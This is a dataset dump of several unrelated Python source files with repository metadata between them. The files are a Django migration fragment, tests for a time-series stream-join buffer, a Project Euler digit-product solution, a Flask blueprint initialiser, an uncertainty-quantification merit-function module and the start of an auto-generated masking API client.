field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='streams.ckanforcard'),
),
migrations.AddField(
model_name='ckanforfeatures',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='ckan_for_cards', to='ckan_pages.featurespage'),
),
]
| 45.573427 | 188 | 0.639558 | 642 | 6,517 | 6.327103 | 0.141745 | 0.053176 | 0.089611 | 0.140817 | 0.855736 | 0.855736 | 0.704825 | 0.704825 | 0.655096 | 0.626539 | 0 | 0.013288 | 0.23784 | 6,517 | 142 | 189 | 45.894366 | 0.80451 | 0.006905 | 0 | 0.713235 | 1 | 0 | 0.211128 | 0.058423 | 0.014706 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022059 | 0 | 0.044118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cdef5d8dcc7fc8e0f97dd96c748ea6b02b5ff4d0 | 18,160 | py | Python | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | 6 | 2019-07-15T22:41:58.000Z | 2020-10-04T11:34:35.000Z | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | null | null | null | server/TimeSeriesJoiner/LocalStreamBuffer/tester.py | iot-salzburg/panta-rhei | 3249fdbb199df59bf400f0f6d0497438afcec443 | [
"Apache-2.0"
] | 3 | 2019-01-11T11:02:00.000Z | 2021-09-30T12:58:50.000Z | #!/usr/bin/env python3
# Tester for the join-algorithm in local_stream_buffer.
import sys
import time
import random
try:
from .local_stream_buffer import Record, StreamBuffer
except ImportError:
from local_stream_buffer import Record, StreamBuffer
def join_fct(record_left, record_right):
"""
Blueprint for the join function, takes two records and merges them using the defined routine.
:param record_left: Record
Record that is joined as left join partner
:param record_right: Record
Record that is joined as right join partner
:return: Record
the resulting record from the join of both partners
"""
record = Record(quantity="t",
result=record_left.get_result() * record_right.get_result(),
timestamp=(record_left.get_time() + record_right.get_time()) / 2)
# here, the resulting record can be produced to e.g. Apache Kafka or a pipeline
return record
def test_one_one():
ts = time.time()
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized Records
N = 100
random.seed(0)
event_order = ["r", "s"] * int(N / 2)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = ["r", "s"] * int(N/2) # works
n_r = n_s = 0
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
# print("\nRecords in buffer r:")
# for rec in stream_buffer.buffer_left:
# print(rec)
# print("Records in buffer s:")
# for rec in stream_buffer.buffer_right:
# print(rec)
# print("Merged records in buffer t:")
events_t = stream_buffer.fetch_results()
# for rec in events_t:
# print(rec)
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 99
def test_five_five():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 20
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * N
n_r = n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 23
def test_five_five_many():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 100_000
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * int(N/10)
n_r = 0
n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
stop_time = time.time()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
print(f"that are {int(len(events_t)/(time.time() - ts))} joins per second.")
assert len(events_t) == 179987
assert stop_time - ts < 12
def test_unordered():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Fill the input_stream with randomized
random.seed(0)
start_time = 1600000000
# Test Settings:
# Create Queues to store the input records
events_r = list()
for i in range(10):
events_r.append(Record(timestamp=i + start_time, quantity="r", result=random.random()))
ts = time.time()
# first ingest all Records into R, then all into s
for event in events_r:
stream_buffer.ingest_left(event) # instant emit
print("Ingest Records into s.")
stream_buffer.ingest_right(Record(timestamp=start_time - 0.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 0.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 5.5, quantity="s", result=random.random()))
stream_buffer.ingest_right(Record(timestamp=start_time + 9.5, quantity="s", result=random.random()))
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {len(events_r)}, |s| = {4}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
if time.time() - ts > 1e-3:
print(f"that are {int(len(events_t)/(time.time() - ts))} joins per second.")
assert len(events_t) == 20
d = {'r.quantity': 'r', 'r.phenomenonTime': 1600000006, 'r.result': 0.7837985890347726,
's.quantity': 's', 's.phenomenonTime': 1600000005.5, 's.result': 0.28183784439970383}
assert d in events_t
def test_randomized():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 20
def test_randomized_many():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10_000
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
stop_time = time.time()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
print(f"that are {int(len(events_t)/(time.time() - ts))} joins per second.")
assert len(events_t) == 23041
assert stop_time - ts < 2 # we got around 0.4 s
def test_delayed_many():
imbalance = 100 # additional latency of stream s
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=sys.maxsize, left="r", buffer_results=True,
verbose=False)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 10_000
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N/10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = ["r"] * imbalance + (["r"] * 5 + ["s"] * 5) * int(N/10)
n_r = 0
n_s = 0
ts = time.time()
while n_r < len(events_r) and n_s < len(events_s):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[n_r+n_s] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[n_r+n_s] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
print(f"that are {int(len(events_t)/(time.time() - ts))} joins per second.")
assert len(events_t) == 13702
assert time.time() - ts < 1 # we got around 0.2 s
def test_timeout_five_five():
# create an instance of the StreamBuffer class
stream_buffer = StreamBuffer(instant_emit=True, delta_time=3, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
N = 20
random.seed(0)
event_order = (["r"] * 5 + ["s"] * 5) * int(N / 10)
start_time = 1600000000
for i in range(len(event_order)):
if event_order[i] == "r":
events_r.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
elif event_order[i] == "s":
events_s.append(Record(timestamp=i + start_time, quantity=event_order[i], result=random.random()))
ingestion_order = (["r"] * 5 + ["s"] * 5) * N
n_r = n_s = 0
ts = time.time()
for i in range(N):
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if ingestion_order[i] == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif ingestion_order[i] == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 13
def test_timeout_randomized():
# create an instance of the StreamBuffer class with a delta_time of 0.5 seconds.
stream_buffer = StreamBuffer(instant_emit=True, delta_time=0.5, left="r", buffer_results=True,
verbose=True)
# Test Settings:
# Create Queues to store the input streams
events_r = list()
events_s = list()
# Fill the input_stream with randomized
n_r = n_s = 10
random.seed(0)
start_time = 1600000000
phenomenon_time = start_time
for i in range(n_r):
phenomenon_time += random.random()
events_r.append(Record(timestamp=phenomenon_time, quantity="r", result=random.random()))
phenomenon_time = start_time
for i in range(n_s):
phenomenon_time += random.random()
events_s.append(Record(timestamp=phenomenon_time, quantity="s", result=random.random()))
ingestion_order = ["r"] * n_r + ["s"] * n_s
random.shuffle(ingestion_order)
n_r = n_s = 0
ts = time.time()
for quantity in ingestion_order:
# decide based on the ingestion order which stream record is forwarded
# store as dict of KafkaRecords and a flag whether it was already joined as older sibling
if quantity == "r":
# receive the first record from the event stream
stream_buffer.ingest_left(events_r[n_r]) # instant emit
n_r += 1
elif quantity == "s":
# receive the first record from the event stream
stream_buffer.ingest_right(events_s[n_s])
n_s += 1
events_t = stream_buffer.fetch_results()
print(f"Join time-series with |r| = {n_r}, |s| = {n_s}.")
print(f"joined {len(events_t)} tuples in {time.time() - ts} s.")
assert len(events_t) == 16
# to profile via cProfile, run it normally with a python interpreter
if __name__ == "__main__":
import cProfile
pr = cProfile.Profile()
pr.enable()
# test ordered ingestion
test_one_one()
test_five_five()
print("\n #############################\n")
print("Testing unordered ingestion:")
test_unordered()
test_randomized()
# test unordered ingestion
print("\n #############################\n")
print("Performance tests")
test_five_five_many()
test_randomized_many()
test_delayed_many()
print("\n #############################\n")
print("Timeout tests")
test_timeout_five_five()
test_timeout_randomized()
pr.disable()
# after your program ends
pr.print_stats(sort="tottime")
# Back in outer section of code
# pr.dump_stats('tester_profile.pstat')
| 37.520661 | 110 | 0.62957 | 2,585 | 18,160 | 4.244874 | 0.082012 | 0.048118 | 0.007382 | 0.016039 | 0.835961 | 0.834685 | 0.808621 | 0.800419 | 0.787205 | 0.783013 | 0 | 0.021922 | 0.253965 | 18,160 | 483 | 111 | 37.598344 | 0.788013 | 0.244989 | 0 | 0.745033 | 0 | 0.003311 | 0.112134 | 0.015988 | 0 | 0 | 0 | 0 | 0.043046 | 1 | 0.033113 | false | 0 | 0.023179 | 0 | 0.059603 | 0.099338 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b56a95803496f05bea0423e4dd78cdd3b91796d8 | 1,745 | py | Python | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | 1 | 2015-08-16T20:30:40.000Z | 2015-08-16T20:30:40.000Z | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | 1 | 2016-08-11T13:06:12.000Z | 2016-08-11T13:06:12.000Z | 08/8.py | cjm00/project-euler | 10f186aafda2ed13bf93cf3e3ba6cff63c85fbd0 | [
"CC-BY-3.0"
] | null | null | null | window = 13 #Problem asks for 13 adjacent digits
#whitespace kept to preserve readability
problem_string = """73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
#strip newlines
problem_string = problem_string.replace('\n', '')
def StringProduct(input): #Takes the product of the individual digits in the input string
total = 1
for k in range(len(input)):
total *= int(input[k])
return total
output = 0
window_product = 0
index = 0
for k in range(len(problem_string)-window):
window_product = StringProduct(problem_string[k:k+window])
if output < window_product:
output = window_product
index = k
print "The string with the greatest product is " + problem_string[index:index+window] + ", at position " + str(index)
print "The product is " + str(output)
| 37.12766 | 117 | 0.876791 | 126 | 1,745 | 12.063492 | 0.507937 | 0.051316 | 0.007895 | 0.014474 | 0.018421 | 0 | 0 | 0 | 0 | 0 | 0 | 0.627646 | 0.079656 | 1,745 | 46 | 118 | 37.934783 | 0.318804 | 0.08596 | 0 | 0 | 0 | 0 | 0.685104 | 0.628536 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.054054 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b57f5f198ffbb8d88c16ba9b6c566b3a8bb98f0e | 205 | py | Python | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | app/blueprints/__init__.py | sarahmk125/flask-model | 4347b2d7fd065c10c150acc7376f21d2cbce6dbc | [
"Apache-2.0"
] | null | null | null | from app.blueprints import home
from app.blueprints import model
from app.blueprints import auth
def init_app(app, blueprints):
for blueprint in blueprints:
app.register_blueprint(blueprint)
| 22.777778 | 41 | 0.780488 | 28 | 205 | 5.642857 | 0.464286 | 0.329114 | 0.322785 | 0.436709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165854 | 205 | 8 | 42 | 25.625 | 0.923977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.5 | 0 | 0.666667 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
a9348c6facb7d21dbbec1ee7d15dc38fd78f9d94 | 8,099 | py | Python | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | 1 | 2022-03-18T14:40:23.000Z | 2022-03-18T14:40:23.000Z | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | null | null | null | uq4k/models/loss.py | JPLMLIA/UQ4K | 7884200992b9bf5b4d8782e243eb4ff2470cea3f | [
"MIT"
] | null | null | null | # Implements objective function class for UQ4K. Provides a general objective
# function framework, which can take an arbitrary forward model.
#
# Author : Mike Stanley
# Written : August 26, 2021
# Last Mod : November 20, 2021
from abc import ABC, abstractmethod
import jax.numpy as jnp
import numpy as np
class AbstractLoss(ABC): # TODO: should these abstract methods be defined here?
def __init__(self):
super().__init__()
@abstractmethod
def sum_sq_norms(self):
"""
Finds the squared 2-norm of the difference between model and data
"""
pass
@abstractmethod
def center_dist(self):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
"""
pass
class MeritFunc(AbstractLoss):
def __init__(self, forward_model, mu, data, qoi_func):
"""
Dimension key:
n : number of data points
d : dimension of each data point
m : dimension of the qoi
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data (np arr) : array of observed data - n x d
qoi_func (function) : maps theta |-> qoi, R^n -> R^m
"""
self.forward_model = forward_model
self.mu = mu
self.data = data
self.qoi_func = qoi_func
def sum_sq_norms(self, params):
"""
Finds the squared 2-norm of the difference between model and data
Dimension key:
p : dimension of model parameters
Parameters:
-----------
params (np arr) : p
Returns:
--------
2-norm of residuals
"""
diffs = self.data - self.forward_model(params)
return np.square(diffs).sum()
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : m
Returns:
--------
squared 2-norm of distance between two points
"""
return np.linalg.norm(self.qoi_func(new_point) - center) ** 2
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
m : dimension of the QoI
Parameters:
-----------
new_point (np arr) : p
center (np arr) : m
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
# find the distance from center
center_dist_term = self.center_dist(new_point=new_point, center=center)
# compute the penalty term
error = self.sum_sq_norms(params=new_point)
merit_term = self.mu * np.max(np.array([0, error - M_alpha]))
return -center_dist_term + merit_term
class DifferentaibleMeritFunc(AbstractLoss):
def __init__(self, forward_model, mu, data, qoi_func):
"""
Dimension key:
n : number of data points
d : dimension of each data point
m : dimension of the qoi
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data (np arr) : array of observed data - n x d
qoi_func (function) : maps theta |-> qoi, R^n -> R^m
"""
self.forward_model = forward_model
self.mu = mu
self.data = data
self.qoi_func = qoi_func
def sum_sq_norms(self, params):
"""
Finds the squared 2-norm of the difference between model and data
Dimension key:
p : dimension of model parameters
Parameters:
-----------
params (jax DeviceArray) : p
Returns:
--------
2-norm of residuals
"""
diffs_squared = jnp.square(self.data - self.forward_model(params))
return jnp.sum(diffs_squared)
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (jax DeviceArray) : p
center (jax DeviceArray) : m
Returns:
--------
squared 2-norm of distance between two points
"""
diffs_squared = jnp.square(self.qoi_func(new_point) - center)
return jnp.sum(diffs_squared)
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
m : dimension of the QoI
Parameters:
-----------
new_point (jax.numpy.DeviceArray) : p
center (np arr) : m
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
center_dist_term = self.center_dist(new_point, center)
error = self.sum_sq_norms(params=new_point)
constraint = self.mu * jnp.max(jnp.array([error - M_alpha, 0]))
return -center_dist_term + constraint
class MeritFunc_NEW(AbstractLoss):
def __init__(self, forward_model, mu, data_y, data_x):
"""
Dimension key:
n : number of data points
dx : dimension of each input
dy : dimension of each output
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data_y (np arr) : array of observed output - n x dy
data_x (np arr) : array of observed input - n x dx
"""
self.forward_model = forward_model
self.mu = mu
self.data_y = data_y
self.data_x = data_x
def sum_sq_norms(self):
"""
Finds the squared 2-norm of the difference between model and data
Dimension key:
p : dimension of model parameters
Parameters:
-----------
params (np arr) : p
Returns:
--------
2-norm of residuals
"""
diffs = self.data_y - self.forward_model(self.data_x)
return np.square(diffs).sum()
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : p
Returns:
--------
squared 2-norm of distance between two points
"""
return np.linalg.norm(new_point - center) ** 2
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : p
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
# find the distance from center
center_dist_term = self.center_dist(new_point=new_point, center=center)
# compute the penalty term
error = self.sum_sq_norms(params=new_point)
merit_term = self.mu * np.max(np.array([0, error - M_alpha]))
return -center_dist_term + merit_term
| 28.318182 | 80 | 0.544512 | 934 | 8,099 | 4.567452 | 0.139186 | 0.048758 | 0.039381 | 0.046414 | 0.83685 | 0.8188 | 0.799578 | 0.771917 | 0.746132 | 0.746132 | 0 | 0.006193 | 0.36202 | 8,099 | 285 | 81 | 28.417544 | 0.819431 | 0.50179 | 0 | 0.639344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003509 | 0 | 1 | 0.245902 | false | 0.032787 | 0.04918 | 0 | 0.508197 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
8d3aebd6e61ac7ee86782ef92c7611cf196b9bc9 | 31,913 | py | Python | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 5 | 2018-08-23T15:47:05.000Z | 2022-01-19T23:38:18.000Z | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 59 | 2018-10-15T10:37:00.000Z | 2022-03-22T20:49:25.000Z | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 12 | 2019-03-08T19:59:13.000Z | 2021-12-16T03:28:04.000Z | # coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class MountFilesystemApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def connect_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Connect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to connect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.connect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.connect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def connect_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Connect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to connect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method connect_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `connect_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/connect', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
